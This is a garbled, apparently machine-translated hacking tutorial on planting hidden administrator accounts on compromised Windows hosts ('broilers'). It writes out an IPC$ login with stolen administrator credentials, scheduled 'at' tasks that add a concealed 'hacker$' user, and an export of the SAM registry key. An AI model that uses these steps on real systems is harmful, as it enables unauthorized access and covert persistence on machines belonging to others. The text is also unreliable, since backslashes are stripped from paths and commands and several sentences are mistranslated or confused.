Masters summarize those methods that hide superusers

Superusers are a user responsible for managing and maintaining the network. This term has a special meaning on the NetWare web. The superuser has full access to all file files, directories, and files, and is the first user to log in to the server after installation. The superuser then immediately changes the password so no other users can access the server and gain unlimited access to the superuser. So how do you hide the superusers in the system? Here are a list of the various hidden superuser methods in the system.
One, how to remotely create hidden superusers under the command line
I will use at The command, because the scheduled task generated by at is running as the system, so the psu.exe program is not used. In order to be able to use the at command, the broiler must have the service of the schedule. If it is not enabled, it can be started remotely by using the tool netsvc.exe or sc.exe in the streamer. Of course, the method can also be used as long as the schedule service can be started.
For the command line mode, you can use a variety of connection methods, such as using SQLexec to connect MSSQL port 1433, you can also use the telnet service, as long as you can get a cmdshell, and have the right to run the at command.
1, first find a broiler, as to how to find that is not the topic I am talking about here. Here we assume that we have found a broiler with a superuser of administrator and a password of 12345678. Now we start to create a hidden superuser for it remotely from the command line. (The host in the example is a host in my LAN. I changed its ip address to 13.50.97.238. Please do not check the number on the Internet to avoid harassing the normal ip address.)
2. The broiler establishes a connection, the command is: net use 13.50.97.238ipc$ "12345678" /user:"administrator
3, use the at command to create a user on the broiler (if the at service is not started, you can use the small netsvc .exe or sc.exe to start remotely):
at 13.50.97.238 12:51 c:\\winntsystem32net.exe user hacker$ 1234 /add
Create this username with the $ character because it is added After the $ character, the user will not be displayed with the net user on the command line, but the user can be seen in the account manager.
4, also use the at command to export the HKEY_LOCAL_MACHINEsamsamDomainsaccountusers key:
at 13.50.97.238 12:55 c:\\winntregedit.exe /e hacker.reg
HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers
/e is regedit.exe The parameter, in the _LOCAL_MACHINESAMSAMDomainsaccountusers key must end with. If necessary, you can enclose "ld:;c:\\winntregedit.exe /e hacker.reg HKEY_LOCAL_MACHINESAMSAMDomainsaccountusers”" in quotation marks.